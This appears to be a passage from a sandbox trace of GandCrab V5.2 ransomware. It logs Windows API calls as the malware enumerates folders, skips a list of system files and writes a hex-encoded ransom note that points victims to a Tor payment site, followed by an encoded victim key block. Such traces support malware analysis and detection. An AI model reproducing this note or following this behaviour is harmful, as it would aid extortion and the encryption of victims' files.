(lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0067.525] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0067.525] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0067.525] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0067.525] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0067.525] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0067.525] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0067.525] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.525] FindNextFileW (in: hFindFile=0x4c9c78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 0 [0067.526] FindClose (in: hFindFile=0x4c9c78 | out: hFindFile=0x4c9c78) returned 1 [0067.526] CloseHandle (hObject=0x218) returned 1 [0067.526] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.526] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0067.526] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0067.526] lstrcatW (in: lpString1="C:\\", lpString2="Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0067.526] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0067.526] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.526] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.526] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.526] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Program Files\\\\TITWMVJL-DECRYPT.txt") returned 38 [0067.526] CreateFileW (lpFileName="C:\\Program Files\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\program files\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0067.527] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x3